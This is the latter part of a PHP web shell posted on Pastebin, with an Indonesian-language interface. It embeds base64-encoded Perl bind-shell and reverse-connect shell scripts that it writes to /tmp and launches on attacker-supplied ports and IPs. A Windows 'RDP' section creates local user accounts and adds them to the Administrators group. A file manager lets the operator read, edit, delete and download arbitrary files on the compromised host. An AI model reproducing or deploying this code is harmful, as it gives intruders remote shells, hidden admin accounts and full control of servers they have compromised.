  2728.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2729.     if(isset($_POST['sub_bp'])) {
  2730.         $f_bp = fopen("/tmp/bp.pl", "w");
  2731.         fwrite($f_bp, base64_decode($bind_port_p));
  2732.         fclose($f_bp);
  2733.  
  2734.         $port = $_POST['port_bind'];
  2735.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  2736.         sleep(1);
  2737.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  2738.         unlink("/tmp/bp.pl");
  2739.     }
  2740.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2741.     if(isset($_POST['sub_bc'])) {
  2742.         $f_bc = fopen("/tmp/bc.pl", "w");
  2743.         fwrite($f_bc, base64_decode($bind_connect_p));
  2744.         fclose($f_bc);
  2745.  
  2746.         $ipbc = $_POST['ip_bc'];
  2747.         $port = $_POST['port_bc'];
  2748.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  2749.         sleep(1);
  2750.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  2751.         unlink("/tmp/bc.pl");
  2752.     }
  2753. } elseif($_GET['do'] == 'krdp_shell') {
  2754.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  2755.         if($_POST['create']) {
  2756.             $user = htmlspecialchars($_POST['user']);
  2757.             $pass = htmlspecialchars($_POST['pass']);
  2758.             if(preg_match("/$user/", exe("net user"))) {
  2759.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  2760.             } else {
  2761.                 $add_user   = exe("net user $user $pass /add");
  2762.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  2763.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  2764.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  2765.                 echo "[ RDP ACCOUNT INFO ]<br>
  2766.                 ------------------------------<br>
  2767.                 IP: <font color=lime>".$ip."</font><br>
  2768.                 Username: <font color=lime>$user</font><br>
  2769.                 Password: <font color=lime>$pass</font><br>
  2770.                 ------------------------------<br><br>
  2771.                 [ STATUS ]<br>
  2772.                 ------------------------------<br>
  2773.                 ";
  2774.                 if($add_user) {
  2775.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  2776.                 } else {
  2777.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  2778.                 }
  2779.                 if($add_groups1) {
  2780.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  2781.                 } elseif($add_groups2) {
  2782.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  2783.                 } elseif($add_groups3) {
  2784.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  2785.                 } else {
  2786.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  2787.                 }
  2788.                 echo "------------------------------<br>";
  2789.             }
  2790.         } elseif($_POST['s_opsi']) {
  2791.             $user = htmlspecialchars($_POST['r_user']);
  2792.             if($_POST['opsi'] == '1') {
  2793.                 $cek = exe("net user $user");
  2794.                 echo "Checking username <font color=lime>$user</font> ....... ";
  2795.                 if(preg_match("/$user/", $cek)) {
  2796.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
  2797.                     ------------------------------<br><br>
  2798.                     <pre>$cek</pre>";
  2799.                 } else {
  2800.                     echo "[ <font color=red>belum ada</font> ]";
  2801.                 }
  2802.             } elseif($_POST['opsi'] == '2') {
  2803.                 $cek = exe("net user $user global");
  2804.                 if(preg_match("/$user/", exe("net user"))) {
  2805.                     echo "[change password: <font color=lime>global</font>] -> ";
  2806.                     if($cek) {
  2807.                         echo "<font color=lime>Berhasil</font>";
  2808.                     } else {
  2809.                         echo "<font color=red>Gagal</font>";
  2810.                     }
  2811.                 } else {
  2812.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2813.                 }
  2814.             } elseif($_POST['opsi'] == '3') {
  2815.                 $cek = exe("net user $user /DELETE");
  2816.                 if(preg_match("/$user/", exe("net user"))) {
  2817.                     echo "[remove user: <font color=lime>$user</font>] -> ";
  2818.                     if($cek) {
  2819.                         echo "<font color=lime>Berhasil</font>";
  2820.                     } else {
  2821.                         echo "<font color=red>Gagal</font>";
  2822.                     }
  2823.                 } else {
  2824.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2825.                 }
  2826.             } else {
  2827.                 //
  2828.             }
  2829.         } else {
  2830.             echo "-- Create RDP --<br>
  2831.             <form method='post'>
  2832.             <input type='text' name='user' placeholder='username' value='global' required>
  2833.             <input type='text' name='pass' placeholder='password' value='global' required>
  2834.             <input type='submit' name='create' value='>>'>
  2835.             </form>
  2836.             -- Option --<br>
  2837.             <form method='post'>
  2838.             <input type='text' name='r_user' placeholder='username' required>
  2839.             <select name='opsi'>
  2840.             <option value='1'>Cek Username</option>
  2841.             <option value='2'>Ubah Password</option>
  2842.             <option value='3'>Hapus Username</option>
  2843.             </select>
  2844.             <input type='submit' name='s_opsi' value='>>'>
  2845.             </form>
  2846.             ";
  2847.         }
  2848.     } else {
  2849.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  2850.     }
  2851. } elseif($_GET['act'] == 'newfile') {
  2852.     if($_POST['new_save_file']) {
  2853.         $newfile = htmlspecialchars($_POST['newfile']);
  2854.         $fopen = fopen($newfile, "a+");
  2855.         if($fopen) {
  2856.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2857.         } else {
  2858.             $act = "<font color=red>permission denied</font>";
  2859.         }
  2860.     }
  2861.     echo $act;
  2862.     echo "<form method='post'>
  2863.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2864.     <input type='submit' name='new_save_file' value='Submit'>
  2865.     </form>";
  2866. } elseif($_GET['act'] == 'newfolder') {
  2867.     if($_POST['new_save_folder']) {
  2868.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2869.         if(!mkdir($new_folder)) {
  2870.             $act = "<font color=red>permission denied</font>";
  2871.         } else {
  2872.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2873.         }
  2874.     }
  2875.     echo $act;
  2876.     echo "<form method='post'>
  2877.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2878.     <input type='submit' name='new_save_folder' value='Submit'>
  2879.     </form>";
  2880. } elseif($_GET['act'] == 'rename_dir') {
  2881.     if($_POST['dir_rename']) {
  2882.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2883.         if($dir_rename) {
  2884.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2885.         } else {
  2886.             $act = "<font color=red>permission denied</font>";
  2887.         }
  2888.     echo "".$act."<br>";
  2889.     }
  2890.     echo "<form method='post'>
  2891.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2892.     <input type='submit' name='dir_rename' value='rename'>
  2893.     </form>";
  2894. } elseif($_GET['act'] == 'delete_dir') {
  2895.     if(is_dir($dir)) {
  2896.         if(is_writable($dir)) {
  2897.             @rmdir($dir);
  2898.             @exe("rm -rf $dir");
  2899.             @exe("rmdir /s /q $dir");
  2900.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2901.         } else {
  2902.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2903.         }
  2904.     }
  2905.     echo $act;
  2906. } elseif($_GET['act'] == 'view') {
  2907.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2908.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2909. } elseif($_GET['act'] == 'edit') {
  2910.     if($_POST['save']) {
  2911.         $save = file_put_contents($_GET['file'], $_POST['src']);
  2912.         if($save) {
  2913.             $act = "<font color=lime>Saved!</font>";
  2914.         } else {
  2915.             $act = "<font color=red>permission denied</font>";
  2916.         }
  2917.     echo "".$act."<br>";
  2918.     }
  2919.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2920.     echo "<form method='post'>
  2921.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2922.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  2923.     </form>";
  2924. } elseif($_GET['act'] == 'rename') {
  2925.     if($_POST['do_rename']) {
  2926.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2927.         if($rename) {
  2928.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2929.         } else {
  2930.             $act = "<font color=red>permission denied</font>";
  2931.         }
  2932.     echo "".$act."<br>";
  2933.     }
  2934.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2935.     echo "<form method='post'>
  2936.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2937.     <input type='submit' name='do_rename' value='rename'>
  2938.     </form>";
  2939. } elseif($_GET['act'] == 'delete') {
  2940.     $delete = unlink($_GET['file']);
  2941.     if($delete) {
  2942.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2943.     } else {
  2944.         $act = "<font color=red>permission denied</font>";
  2945.     }
  2946.     echo $act;
  2947. } else {
  2948.     if(is_dir($dir) === true) {
  2949.         if(!is_readable($dir)) {
  2950.             echo "<font color=red>can't open directory. ( not readable )</font>";
  2951.         } else {
  2952.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2953.             <tr>
  2954.             <th class="th_home"><center>Name</center></th>
  2955.             <th class="th_home"><center>Type</center></th>
  2956.             <th class="th_home"><center>Size</center></th>
  2957.             <th class="th_home"><center>Last Modified</center></th>
  2958.             <th class="th_home"><center>Owner/Group</center></th>
  2959.             <th class="th_home"><center>Permission</center></th>
  2960.             <th class="th_home"><center>Action</center></th>
  2961.             </tr>';
  2962.             $scandir = scandir($dir);
  2963.             foreach($scandir as $dirx) {
  2964.                 $dtype = filetype("$dir/$dirx");
  2965.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2966.                 if(function_exists('posix_getpwuid')) {
  2967.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2968.                     $downer = $downer['name'];
  2969.                 } else {
  2970.                     //$downer = $uid;
  2971.                     $downer = fileowner("$dir/$dirx");
  2972.                 }
  2973.                 if(function_exists('posix_getgrgid')) {
  2974.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2975.                     $dgrp = $dgrp['name'];
  2976.                 } else {
  2977.                     $dgrp = filegroup("$dir/$dirx");
  2978.                 }
  2979.                 if(!is_dir("$dir/$dirx")) continue;
  2980.                 if($dirx === '..') {
  2981.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2982.                 } elseif($dirx === '.') {
  2983.                     $href = "<a href='?dir=$dir'>$dirx</a>";
  2984.                 } else {
  2985.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2986.                 }
  2987.                 if($dirx === '.' || $dirx === '..') {
  2988.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2989.                     } else {
  2990.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2991.                 }
  2992.                 echo "<tr>";
  2993.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2994.                 echo "<td class='td_home'><center>$dtype</center></td>";
  2995.                 echo "<td class='td_home'><center>-</center></th></td>";
  2996.                 echo "<td class='td_home'><center>$dtime</center></td>";
  2997.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2998.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2999.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  3000.                 echo "</tr>";
  3001.             }
  3002.         }
  3003.     } else {
  3004.         echo "<font color=red>can't open directory.</font>";
  3005.     }
  3006.         foreach($scandir as $file) {
  3007.             $ftype = filetype("$dir/$file");
  3008.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  3009.             $size = filesize("$dir/$file")/1024;
  3010.             $size = round($size,3);
  3011.             if(function_exists('posix_getpwuid')) {
  3012.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  3013.                 $fowner = $fowner['name'];
  3014.             } else {
  3015.                 //$downer = $uid;
  3016.                 $fowner = fileowner("$dir/$file");
  3017.             }
  3018.             if(function_exists('posix_getgrgid')) {
  3019.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  3020.                 $fgrp = $fgrp['name'];
  3021.             } else {
  3022.                 $fgrp = filegroup("$dir/$file");
  3023.             }
  3024.             if($size > 1024) {
  3025.                 $size = round($size/1024,2). 'MB';
  3026.             } else {
  3027.                 $size = $size. 'KB';
  3028.             }
  3029.             if(!is_file("$dir/$file")) continue;
  3030.             echo "<tr>";
  3031.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  3032.             echo "<td class='td_home'><center>$ftype</center></td>";
  3033.             echo "<td class='td_home'><center>$size</center></td>";
  3034.             echo "<td class='td_home'><center>$ftime</center></td>";
  3035.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  3036.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  3037.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  3038.             echo "</tr>";
  3039.         }
  3040.         echo "</table>";
  3041.         if(!is_readable($dir)) {
  3042.             //
  3043.         } else {
  3044.         }
  3045. }
  3046. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top